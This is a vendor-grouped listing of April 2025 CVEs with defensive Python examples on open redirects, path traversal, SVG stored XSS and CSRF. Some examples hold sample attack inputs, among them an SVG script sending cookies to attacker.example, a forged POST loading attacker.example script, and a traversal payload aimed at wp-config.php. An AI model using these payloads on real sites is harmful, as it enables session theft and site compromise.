CVE-2025-32116 | High | 7.1 | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Studi7 QR Master qr-master allows Reflected XSS. This issue affects QR Master: from n/a through <= 1.0.5. |
Sudavar · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32500 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Sudavar Codescar Radio Widget codescar-radio-widget allows Stored XSS. This issue affects Codescar Radio Widget: from n/a through <= 0.4.2. |
Syammohanm · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3064 | High | 8.8 | — | 2025-04-08 | The WPFront User Role Editor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.1. |
The Qt Company · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3512 | — | — | — | 2025-04-11 | There is a Heap-based Buffer Overflow vulnerability in QTextMarkdownImporter. |
Themehunk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2568 | Medium | 5.3 | — | 2025-04-08 | The Vayu Blocks – Gutenberg Blocks for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on the 'vayu_blocks_get_toggle_switch_values_callback' and '… |
Themeum · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32230 | Medium | 4.3 | — | 2025-04-10 | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Themeum Tutor LMS tutor. This issue affects Tutor LMS: from n/a through <= 3.4.0. |
Theode · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31382 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in theode Language Field language-field allows Stored XSS. This issue affects Language Field: from n/a through <= 0.9. |
Tianocore · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-38797 | Medium | 4.6 | — | 2025-04-07 | EDK2 contains a vulnerability in the HashPeImageByType(). |
Tiki · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32461 | Critical | 9.9 | — | 2025-04-09 | wikiplugin_includetpl in lib/wiki-plugins/wikiplugin_includetpl.php in Tiki before 28.3 mishandles input to an eval. |
Tim · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32489 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tim Wetterwarner wetterwarner allows Stored XSS. This issue affects Wetterwarner: from n/a through <= 2.7.3. |
Toast Plugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32243 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in Toast Plugins Internal Link Optimiser internal-link-finder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Internal Link Optimiser: from n/a through <= 5.1.2. |
Totalprocessing · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32209 | Medium | 6.5 | — | 2025-04-10 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in totalprocessing Nomupay Payment Processing Gateway totalprocessing-card-payments allows Path Traversal. This issue affects Nomupay Payment Proce… |
Tournamatch · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32600 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Tournamatch Tournamatch tournamatch allows Reflected XSS. This issue affects Tournamatch: from n/a through <= 4.7.0. |
Tp-link · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3442 | — | — | — | 2025-04-09 | This vulnerability exists in TP-Link Tapo H200 V1 IoT Smart Hub due to storage of Wi-Fi credentials in plain text within the device firmware. |
Tp-link Corporation Limited · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32107 | High | 8.0 | — | 2025-04-11 | OS command injection vulnerability exists in Deco BE65 Pro firmware versions prior to "Deco BE65 Pro(JP)_V1_1.1.2 Build 20250123". |
Trusty Plugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32585 | High | 7.5 | — | 2025-04-11 | Path Traversal: '.../...//' vulnerability in Trusty Plugins Shop Products Filter trusty-woo-products-filter allows PHP Local File Inclusion. This issue affects Shop Products Filter: from n/a through <= 1.2. |
Twispay · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32601 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in twispay Twispay Credit Card Payments twispay allows Reflected XSS. This issue affects Twispay Credit Card Payments: from n/a through <= 2… |
Umbraco · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32017 | High | 8.8 | — | 2025-04-08 | Umbraco is a free and open source .NET content management system. |
Uncodethemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32496 | Critical | 9.6 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Uncodethemes Ultra Demo Importer ut-demo-importer allows Upload a Web Shell to a Web Server. This issue affects Ultra Demo Importer: from n/a through <= 1.0.5. |
Uzair · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31005 | Medium | 4.3 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Uzair Easyfonts easyfonts allows Cross Site Request Forgery. This issue affects Easyfonts: from n/a through <= 1.1.2. |
Vagonic · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32236 | Medium | 4.3 | — | 2025-04-10 | Missing Authorization vulnerability in Vagonic Woocommerce Products Reorder Drag Drop Multiple Sort – Sortable, Rearrange Products Vagonic vagonic-sortable. This issue affects Woocommerce Products Reorder Drag Drop Multiple Sort – Sortable… |
Vertim · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32565 | Critical | 9.3 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in vertim Neon Product Designer neon-product-designer-for-woocommerce allows SQL Injection. This issue affects Neon Product Designer: from n/… |
Vfvalent · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31393 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in vfvalent Social Bookmarking RELOADED social-bookmarking-reloaded allows Stored XSS. This issue affects Social Bookmarking RELOADED: from n/a through <= 3.18. |
Vibethemes · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32493 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VibeThemes BP Social Connect bp-social-connect allows Stored XSS. This issue affects BP Social Connect: from n/a through <= 1.6.2. |
Vikashsrivastava1111989 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2805 | High | 7.3 | — | 2025-04-10 | The ORDER POST plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 2.0.2. |
Vitejs · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32395 | — | — | — | 2025-04-10 | Vite is a frontend tooling framework for javascript. |
Vivotek · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3403 | Low | 2.7 | — | 2025-04-08 | A vulnerability was found in Vivotek NVR ND8422P, NVR ND9525P and NVR ND9541P 2.4.0.204/3.3.0.104/4.2.0.101. |
Vsourz Digital · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32621 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Vsourz Digital WP Map Route Planner wp-map-route-planner allows Cross Site Request Forgery. This issue affects WP Map Route Planner: from n/a through <= 1.0.0. |
Webinarpress · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32693 | Medium | 4.7 | — | 2025-04-09 | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in WPWebinarSystem WebinarPress wp-webinarsystem allows Phishing. This issue affects WebinarPress: from n/a through <= 1.33.28. |
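The open-redirect class in the WebinarPress row is worth seeing in code, because the usual "fixes" (checking that the parameter starts with `/`, or contains the site's hostname) are exactly what phishing payloads bypass. The block below is an added example, not code from the plugin or the advisory; the site origin `https://shop.example` and the request values are constructed for the demo. It contrasts the verbatim `Location:` pattern with a resolver that forces the target back onto the site's own origin and rejects the scheme-relative (`//evil`), backslash and `javascript:` variants.

```python
from urllib.parse import urljoin, urlsplit

SITE_ORIGIN = "https://shop.example"   # constructed origin of the site being protected


def vulnerable_redirect_target(next_url: str) -> str:
    """Vulnerable shape: whatever ?redirect= carried becomes the Location header."""
    return next_url


def safe_redirect_target(next_url: str, fallback: str = SITE_ORIGIN + "/") -> str:
    """Hardened: resolve the value against the site origin, then insist the
    resolved scheme and host are still the site's own. Anything else goes to
    the fallback page instead of an attacker-chosen host."""
    if any(c in next_url for c in "\\\r\n\x00"):
        return fallback                 # browsers treat '\' as '/', CR/LF would split headers
    resolved = urljoin(SITE_ORIGIN + "/", next_url)
    target, site = urlsplit(resolved), urlsplit(SITE_ORIGIN)
    if target.scheme != site.scheme or target.netloc.lower() != site.netloc.lower():
        return fallback                 # '//evil.example', 'https://evil.example', 'user@evil' ...
    return resolved


if __name__ == "__main__":
    # Constructed phishing-style values an attacker would put in the redirect parameter.
    for candidate in ("/my-account?tab=orders", "//evil.example/login",
                      "https://shop.example@evil.example/", "/\\evil.example",
                      "javascript:alert(1)"):
        print(f"{candidate!r:45} -> {safe_redirect_target(candidate)}")
```

The resolver deliberately does not try to "clean" the input; it normalises and then compares origin, so new encodings of the same trick still fail the comparison rather than slipping past a denylist.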
Webliberty · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31020 | Medium | 6.5 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webliberty Simple Spoiler simple-spoiler allows Stored XSS. This issue affects Simple Spoiler: from n/a through <= 1.4. |
Wladyslaw Madejczyk · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31404 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Wladyslaw Madejczyk AF Tell a Friend af-tell-a-friend allows Stored XSS. This issue affects AF Tell a Friend: from n/a through <= 1.4. |
Workbox · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32534 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Workbox Workbox Video from Vimeo & Youtube workbox-video-from-vimeo-youtube-plugin allows Reflected XSS. This issue affects Workbox Video… |
Wp Guru · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32681 | High | 8.5 | — | 2025-04-11 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in WP Guru Error Log Viewer error-log-viewer-wp allows Blind SQL Injection. This issue affects Error Log Viewer: from n/a through <= 1.0.5. |
Wp Map Plugins · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32661 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in WP Map Plugins Interactive US Map interactive-us-map allows Stored XSS. This issue affects Interactive US Map: from n/a through <= 2.7. |
Wp Messiah · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32228 | Medium | 4.3 | — | 2025-04-10 | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in WP Messiah Ai Image Alt Text Generator for WP ai-image-alt-text-generator-for-wp allows Retrieve Embedded Sensitive Data. This issue affects Ai Imag… |
Wp Shuffle · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32692 | High | 7.5 | — | 2025-04-09 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WP Shuffle WP Subscription Forms wp-subscription-forms allows PHP Local File Inclusion. This issue affects WP Subscript… |
Wp Table Builder · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32598 | High | 7.1 | — | 2025-04-11 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Table Builder WP Table Builder wp-table-builder allows Reflected XSS. This issue affects WP Table Builder: from n/a through <= 2.0.5. |
Wpsolr · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-31036 | High | 8.8 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in WPSOLR WPSolr wpsolr-free allows Privilege Escalation. This issue affects WPSolr: from n/a through <= 24.0. |
Wpvsingh · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32240 | Medium | 6.5 | — | 2025-04-10 | Missing Authorization vulnerability in wpvsingh Site Notify site-notify allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Site Notify: from n/a through <= 1.0. |
Wpwax · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32499 | Medium | 6.5 | — | 2025-04-09 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in wpWax Logo Showcase Ultimate logo-showcase-ultimate allows PHP Local File Inclusion. This issue affects Logo Showcase U… |
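Three rows in this section are the same bug shape: a request-controlled filename reaching `include`/`require` (the Shop Products Filter row, with its `'.../...//'` traversal pattern, and the WP Subscription Forms and Logo Showcase Ultimate rows). The `'.../...//'` notation is the CWE-35 variant that exists precisely because a single-pass removal of `../` leaves a fresh `../` behind. The block below is an added example, not code from any of these plugins; the template directory path is constructed for the demo. It shows the naive strip failing against the dotted payload while blocking the obvious one, next to a containment check that does not try to clean the input at all.

```python
import posixpath
from typing import Optional

# Constructed layout for the demo; not a real plugin's paths.
TEMPLATE_ROOT = "/var/www/html/wp-content/plugins/example-plugin/templates"


def naive_strip_traversal(name: str) -> str:
    """The broken 'fix' that the '.../...//' pattern (CWE-35) defeats: delete
    '../' in one pass. Removing the two inner '../' from '.../...//' leaves
    '.' + '.' + '/' behind, which is '../' again."""
    return name.replace("../", "")


def vulnerable_include_path(template: str) -> str:
    """Vulnerable shape: sanitise once, then build the include path."""
    cleaned = naive_strip_traversal(template)
    return posixpath.normpath(posixpath.join(TEMPLATE_ROOT, cleaned))


def safe_include_path(template: str) -> Optional[str]:
    """Hardened: normalise the joined path and require it to remain under
    TEMPLATE_ROOT with the expected extension. Returns None when rejected."""
    if "\x00" in template:                 # NUL would truncate the name in C-level file APIs
        return None
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_ROOT, template))
    root_prefix = TEMPLATE_ROOT.rstrip("/") + "/"
    if not candidate.startswith(root_prefix):
        return None                        # escaped the template directory (or absolute path)
    if not candidate.endswith(".php"):
        return None                        # php://filter, .txt, logs, etc.
    return candidate


if __name__ == "__main__":
    payload = ".../...//" * 4 + "wp-config.php"   # four directory levels above TEMPLATE_ROOT
    print("naive strip turns '.../...//' into", repr(naive_strip_traversal(".../...//")))
    print("vulnerable resolves payload to:", vulnerable_include_path(payload))
    print("hardened resolves payload to:  ", safe_include_path(payload))
    print("hardened on plain ../ traversal:", safe_include_path("../../../../wp-config.php"))
```

On a live filesystem the hardened version would additionally pass the candidate through `os.path.realpath()` before the prefix check, so a symlink inside the template directory cannot point back out; that step is left out here because the demo paths are not real. An allowlist of known template names is stricter still and is the right choice when the set of includable files is small.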
Wpzita · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2575 | Medium | 6.4 | — | 2025-04-11 | The Z Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.1 due to insufficient input sanitization and output escaping. |
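The Z Companion row is stored XSS through SVG upload, a class that keeps recurring because an SVG is an XML document that browsers execute (`<script>`, `on*` handlers, `javascript:` links, and HTML smuggled in via `foreignObject`), yet upload filters treat it as an image. The block below is an added example, not the plugin's code or the advisory's proof of concept: a constructed hostile SVG is run through an allowlist-based sanitiser built on the standard library, and an independent checker confirms nothing active survives. The element allowlist is an assumption sized for the demo; a production list would be longer and should be reviewed element by element.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)          # keep serialised output free of ns0: prefixes
ET.register_namespace("xlink", XLINK_NS)

# Constructed hostile upload (not the advisory's proof of concept). Each vector
# fires when the file is rendered as a document rather than through <img>.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="javascript:alert(2)"><text x="10" y="20">click</text></a>
  <circle cx="50" cy="50" r="40" onclick="alert(3)" fill="red"/>
  <foreignObject><body xmlns="http://www.w3.org/1999/xhtml"><img src="x" onerror="alert(4)"/></body></foreignObject>
</svg>
"""

ALLOWED_TAGS = {"svg", "g", "defs", "title", "desc", "path", "circle", "ellipse",
                "rect", "line", "polyline", "polygon", "text", "tspan", "a"}
SAFE_URL_SCHEMES = {"", "http", "https"}   # '' covers relative paths and #fragment references


def _local(qname: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tags and attributes."""
    return qname.split("}", 1)[1] if qname.startswith("{") else qname


def _url_scheme(value: str) -> str:
    v = value.strip().lower()
    return v.split(":", 1)[0] if ":" in v else ""


def _clean(elem: ET.Element) -> None:
    for attr in list(elem.attrib):
        name = _local(attr).lower()
        if name.startswith("on") or name == "style":
            del elem.attrib[attr]          # event handlers; CSS can carry url()/expressions
        elif name == "href" and _url_scheme(elem.attrib[attr]) not in SAFE_URL_SCHEMES:
            del elem.attrib[attr]          # javascript:, data:, vbscript:, obfuscated schemes
    for child in list(elem):
        if _local(child.tag) not in ALLOWED_TAGS:
            elem.remove(child)             # script, foreignObject, image, use, ...
        else:
            _clean(child)


def sanitize_svg(data: bytes) -> bytes:
    """Allowlist-based SVG sanitiser: drop unknown elements and active attributes."""
    root = ET.fromstring(data)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    _clean(root)
    return ET.tostring(root, encoding="utf-8")


def has_active_content(data: bytes) -> bool:
    """Independent check used to verify the sanitiser's output."""
    root = ET.fromstring(data)
    for elem in root.iter():
        if _local(elem.tag) not in ALLOWED_TAGS:
            return True
        for attr, value in elem.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on") or (name == "href" and _url_scheme(value) not in SAFE_URL_SCHEMES):
                return True
    return False


if __name__ == "__main__":
    cleaned = sanitize_svg(MALICIOUS_SVG)
    print("active content before:", has_active_content(MALICIOUS_SVG))
    print("active content after: ", has_active_content(cleaned))
    print(cleaned.decode())
```

Two caveats for real deployments: parse untrusted XML with entity-expansion limits (the `defusedxml` package wraps the same API), and remember that sanitising is only one half of the fix; serving uploads with `Content-Disposition: attachment` or from a separate origin removes the "rendered as a document in the site's origin" condition that makes the payload matter.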
Xmlsoft · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32414 | Medium | 5.6 | — | 2025-04-08 | In libxml2 before 2.13.8 and 2.14.x before 2.14.2, out-of-bounds memory access can occur in the Python API (Python bindings) because of an incorrect return value. |
Xxyopen · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3369 | Medium | 6.3 | — | 2025-04-07 | A vulnerability was found in xxyopen Novel-Plus 5.1.0. |
Yaycommerce · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3434 | High | 7.2 | — | 2025-04-11 | The SMTP for Amazon SES – YaySMTP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Email Logs in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. |
Ydesignservices · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32617 | High | 7.1 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in Ydesignservices Multiple Location Google Map multiple-location-google-map allows Stored XSS. This issue affects Multiple Location Google Map: from n/a through <= 1.1. |
Zealopensource · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2883 | Medium | 5.3 | — | 2025-04-08 | The Accept SagePay Payments Using Contact Form 7 plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0 through the publicly accessible phpinfo.php script. |
Zealousweb · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32679 | Medium | 5.4 | — | 2025-04-09 | Cross-Site Request Forgery (CSRF) vulnerability in ZealousWeb User Registration Using Contact Form 7 user-registration-using-contact-form-7 allows Cross Site Request Forgery. This issue affects User Registration Using Contact Form 7: from n… |
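CSRF is the most frequent class in this section (the Ultra Demo Importer, Easyfonts, Social Bookmarking RELOADED, WP Map Route Planner, AF Tell a Friend, Interactive US Map, WPSolr, Multiple Location Google Map and User Registration Using Contact Form 7 rows), and the impact ranges from stored XSS to privilege escalation to web-shell upload depending on what the unprotected handler does. The block below is an added example, not code from any of these plugins. It re-implements the WordPress nonce construction (an HMAC over `tick|action|user|session token`, truncated to 10 hex characters, valid for the current and previous 12-hour tick) in Python and runs a simulated settings handler with and without the nonce check, so the difference between "the user is an admin" and "the admin intended this request" is visible. The secret, action name and session token are constructed for the demo.

```python
import hashlib
import hmac
import math
from typing import Dict

# Assumptions for the demo: a constructed secret standing in for the site's
# NONCE_KEY/NONCE_SALT, and a constructed action name.
NONCE_SECRET = b"constructed-demo-secret-do-not-reuse"
NONCE_LIFE = 24 * 60 * 60             # WordPress default lifetime: 24 h, ticking every 12 h
ACTION = "demo_plugin_save_settings"


def nonce_tick(now: float) -> int:
    return math.ceil(now / (NONCE_LIFE / 2))


def _nonce_for_tick(tick: int, action: str, user_id: int, session_token: str) -> str:
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    return hmac.new(NONCE_SECRET, msg, hashlib.md5).hexdigest()[-12:-2]


def create_nonce(action: str, user_id: int, session_token: str, now: float) -> str:
    """Same construction as wp_create_nonce(): HMAC over tick|action|uid|token, 10 hex chars."""
    return _nonce_for_tick(nonce_tick(now), action, user_id, session_token)


def verify_nonce(nonce: str, action: str, user_id: int, session_token: str, now: float) -> int:
    """Mirrors wp_verify_nonce(): 1 = current tick, 2 = previous tick, 0 = invalid."""
    tick = nonce_tick(now)
    for age, t in ((1, tick), (2, tick - 1)):
        expected = _nonce_for_tick(t, action, user_id, session_token)
        if hmac.compare_digest(expected.encode(), nonce.encode()):
            return age
    return 0


def save_settings(post: Dict[str, str], user_id: int, is_admin: bool, session_token: str,
                  now: float, settings: Dict[str, str], check_nonce: bool) -> bool:
    """Simulated admin-post handler. check_nonce=False reproduces the vulnerable
    shape: a capability check alone does not prove the admin intended the request,
    because the browser attaches the login cookie to a form an attacker's page submits."""
    if not is_admin:
        return False                      # authorization (a separate control from CSRF)
    if check_nonce and verify_nonce(post.get("_wpnonce", ""), ACTION, user_id,
                                    session_token, now) == 0:
        return False                      # request origin not proven: reject
    settings["header_html"] = post.get("header_html", "")   # e.g. stored XSS sink
    return True


if __name__ == "__main__":
    now, token = 1_700_000_000.0, "constructed-session-token"
    forged = {"header_html": "<script src=//attacker.example/x.js></script>"}   # constructed
    store: Dict[str, str] = {}
    print("vulnerable handler accepted forged POST:", save_settings(forged, 1, True, token, now, store, False))
    print("hardened handler accepted forged POST:  ", save_settings(forged, 1, True, token, now, {}, True))
    legit = dict(forged, _wpnonce=create_nonce(ACTION, 1, token, now))
    print("hardened handler accepted nonce'd POST: ", save_settings(legit, 1, True, token, now, {}, True))
```

The attacker's page cannot produce a valid `_wpnonce` because it never sees the secret or the victim's session token, and the nonce is bound to the action, so one leaked for a harmless action does not unlock another. In WordPress the equivalent checks are `check_admin_referer()` or `wp_verify_nonce()` for form posts and `check_ajax_referer()` for admin-ajax handlers.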
Zhangyanbo2007 · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3381 | Medium | 6.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in zhangyanbo2007 youkefu 4.2.0. |
آریا وردپرس · 1 CVE
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32488 | Medium | 5.9 | — | 2025-04-09 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in آریا وردپرس Aria Font aria-font allows Stored XSS. This issue affects Aria Font: from n/a through <= 1.4. |